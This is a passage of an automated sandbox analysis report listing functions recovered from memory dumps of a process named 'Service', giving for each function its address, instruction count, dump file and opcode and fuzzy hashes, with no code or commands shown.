                                • Opcode ID: 3aadef205324f6e75133266d2e4d8c8ab8b6b3c07d20c22a2b9b2e0d128448ef
                                • Instruction ID: 8be30f04efc8c2f932c12eaeb71c7664decebe1503b2c2fba4729f7d164a3129
                                • Opcode Fuzzy Hash: 3aadef205324f6e75133266d2e4d8c8ab8b6b3c07d20c22a2b9b2e0d128448ef
                                • Instruction Fuzzy Hash: D221D130E05208DFDB88DBB8D8557AE7BF5EF85200F1081AED409DB296DB349D05CB91
                                Function 01690828 Relevance: .1, Instructions: 60COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.1914312878.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_1690000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f83a598a4399e0cf7a7a4c4558ac890299ab6bbe259f92a1c475f81cb33507fc
                                • Instruction ID: 402d113dfe63cbb250300c5dbb78bd692a7be9a0870526b89008fe155fe15629
                                • Opcode Fuzzy Hash: f83a598a4399e0cf7a7a4c4558ac890299ab6bbe259f92a1c475f81cb33507fc
                                • Instruction Fuzzy Hash: 752148301013598FDB05DF2AFD88A553B75FB85705B009695D8148F226D7F8ADCACF82
                                Function 01690848 Relevance: .0, Instructions: 47COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.1914312878.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_1690000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 18f092fe2ec6a70090a3f6f0858d82d45343856de4a5773e7ef78f4824b3e136
                                • Instruction ID: fc479324b91fd99f0da4377a922f201b3103a5c844c48dfded929e7212aa601b
                                • Opcode Fuzzy Hash: 18f092fe2ec6a70090a3f6f0858d82d45343856de4a5773e7ef78f4824b3e136
                                • Instruction Fuzzy Hash: 3311903011131A9FDB15DF1AFA88A457BB5F788705B009695D8148F239D7F8ADCACF82

                                Executed Functions

                                Function 025713B8 Relevance: .3, Instructions: 291COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001E.00000002.1914835035.0000000002570000.00000040.00000800.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_30_2_2570000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b65ecaaea89eb2df90f7657801af8c89a658cd3f73c808ed2922d9320489a57b
                                • Instruction ID: df565ad52c1bd192c215561bd1aa3f48b7133c882332bac9f0f32806e9c609f8
                                • Opcode Fuzzy Hash: b65ecaaea89eb2df90f7657801af8c89a658cd3f73c808ed2922d9320489a57b
                                • Instruction Fuzzy Hash: B5A19370B042588FDB08AB75985477E7BB7BFC8740B1AC96ED506EB294CE34D802C795
                                Function 02570D95 Relevance: .5, Instructions: 472COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001E.00000002.1914835035.0000000002570000.00000040.00000800.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_30_2_2570000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ed191ada3cd37c6073d042a452bfefc85dd23106c75002e429ac3fc4c2467ed1
                                • Instruction ID: 8754847f89b2454b0730884bdb117e15da382a8338dfde60c22fc1a40e51e3d2
                                • Opcode Fuzzy Hash: ed191ada3cd37c6073d042a452bfefc85dd23106c75002e429ac3fc4c2467ed1
                                • Instruction Fuzzy Hash: 7A514F346003458FEB16FB74E86857E7BE2BB896117008AA9D816CB7A5EF349D05CF81
                                Function 02571010 Relevance: .2, Instructions: 249COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001E.00000002.1914835035.0000000002570000.00000040.00000800.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_30_2_2570000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eebf60801ad0a49f96e829f960a245e0f8c1d9528a516b7edaa2fabe3c11ed07
                                • Instruction ID: 6870f32638744aa26f2d61be6219eb2493b091852c78bc3d3bd90f2d2628757f
                                • Opcode Fuzzy Hash: eebf60801ad0a49f96e829f960a245e0f8c1d9528a516b7edaa2fabe3c11ed07
                                • Instruction Fuzzy Hash: 4C918C347003058FDB05EB79E858A7E7BE2BF89611B1089A9E416CB3A5EF349D05CB81
                                Function 02571970 Relevance: .1, Instructions: 144COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001E.00000002.1914835035.0000000002570000.00000040.00000800.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_30_2_2570000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e879c7c5a2530c46cd6d489b3b3022ce1334ecf8ce6a8ac8e4de2565e247e196
                                • Instruction ID: 3b1d762240c323da86e6c046eede471d674bc714e60ba0df43080aefccbaa632
                                • Opcode Fuzzy Hash: e879c7c5a2530c46cd6d489b3b3022ce1334ecf8ce6a8ac8e4de2565e247e196
                                • Instruction Fuzzy Hash: 95414831B012558FDB48EB79585437EBBE7AFC9600B1884AED44ADB392DF348D0287A5
                                Function 02571157 Relevance: .1, Instructions: 92COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001E.00000002.1914835035.0000000002570000.00000040.00000800.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_30_2_2570000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c402740308add972ec037a901da31848e3c7d34cd3792ca99840a7f9e6cf9e4c
                                • Instruction ID: e2634505e55645ea0ad2767dd40ad2eb8372b676d124287544c321ac85a3425b
                                • Opcode Fuzzy Hash: c402740308add972ec037a901da31848e3c7d34cd3792ca99840a7f9e6cf9e4c
                                • Instruction Fuzzy Hash: 0031E231340B008BDB59BB39982467E7AE2BFC46143408A6EC41BCB790DF34DE059BD2
                                Function 02571860 Relevance: .1, Instructions: 75COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001E.00000002.1914835035.0000000002570000.00000040.00000800.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_30_2_2570000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b4a9cc36b11424932f4c4402587044fc2bc549e310b4b35ccc6752d261fdb19b
                                • Instruction ID: 57070cc5fe07c858a51cb90eb998db83cfd20aabcfc0c4cb7bf4435bb4ad376a
                                • Opcode Fuzzy Hash: b4a9cc36b11424932f4c4402587044fc2bc549e310b4b35ccc6752d261fdb19b
                                • Instruction Fuzzy Hash: 1321C071B002049FDB58EBBA881936FBAEAEFC8600B15846ED44BD7391DF348C0157A6
                                Function 02571740 Relevance: .1, Instructions: 74COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001E.00000002.1914835035.0000000002570000.00000040.00000800.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_30_2_2570000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4eae81c15062f9f26cf7ef537d266438e47430f1a162697bf0d755ff0dae2f23
                                • Instruction ID: 05e11275d1045bf5e52761a23d0873bae2b60d5197e74121fb9ab84683d22f8e
                                • Opcode Fuzzy Hash: 4eae81c15062f9f26cf7ef537d266438e47430f1a162697bf0d755ff0dae2f23
                                • Instruction Fuzzy Hash: 90317A34900309DFDB45FBB8D8546AEBBB6FF88300F208569D405AB355EB346A45CF51
                                Function 02571750 Relevance: .1, Instructions: 70COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001E.00000002.1914835035.0000000002570000.00000040.00000800.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_30_2_2570000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: be5fb74f634b936124b1ba7520e02a660e693cf2f3ccd4a5370120e2a3ce7cd8
                                • Instruction ID: c2d041aaf09ef02de301623b317f8bd1b548464797e24fff01b4795a198935c8
                                • Opcode Fuzzy Hash: be5fb74f634b936124b1ba7520e02a660e693cf2f3ccd4a5370120e2a3ce7cd8
                                • Instruction Fuzzy Hash: 7C2139749003099FDB45FBB8D8446AEBBB6FB88300F108569D405AB345DB745A44CF51
                                Function 02570939 Relevance: .1, Instructions: 64COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001E.00000002.1914835035.0000000002570000.00000040.00000800.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_30_2_2570000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 18f679d2e23ca49447cc5c38cdc2c0df9744a1a0ee16fdc6c53e5db795d64671
                                • Instruction ID: af27e97172f554692e5554c0dd7a6e154e7f162993cf9cfe728130df9753ddaa
                                • Opcode Fuzzy Hash: 18f679d2e23ca49447cc5c38cdc2c0df9744a1a0ee16fdc6c53e5db795d64671
                                • Instruction Fuzzy Hash: D121C330A05204CFCB54EBB8D9557AE7BF2EF88300F6580AAC549EB792EB348D05C795
                                Function 02570828 Relevance: .1, Instructions: 59COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001E.00000002.1914835035.0000000002570000.00000040.00000800.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_30_2_2570000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b7f0720c850cac9fba65f3cc0b2811f8b32a2f2c1b3986e945e3bc2eee22248b
                                • Instruction ID: fe4a7b30fe1bb8540cf99a34852a486f366af3778265f59874ae1c1a06efb818
                                • Opcode Fuzzy Hash: b7f0720c850cac9fba65f3cc0b2811f8b32a2f2c1b3986e945e3bc2eee22248b
                                • Instruction Fuzzy Hash: 2E212C341053568FEB02FB38FC90A953BA9BB8D605B04CA95D4248F36ED7786D0ACF81
                                Function 02570848 Relevance: .0, Instructions: 47COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001E.00000002.1914835035.0000000002570000.00000040.00000800.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_30_2_2570000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6c829f9d2fd762f93f12886e3e2dc5b5eefe35d10e4e6c13bafe9012bfda5b47
                                • Instruction ID: 6a9e57755cbbf7805cce3511af29c42b15d6906b4c22d56739225a691194b768
                                • Opcode Fuzzy Hash: 6c829f9d2fd762f93f12886e3e2dc5b5eefe35d10e4e6c13bafe9012bfda5b47
                                • Instruction Fuzzy Hash: AE11477451131A9FEB02FB28F984A557BA9B78C605B00DA54D8248F32EDB7869098F81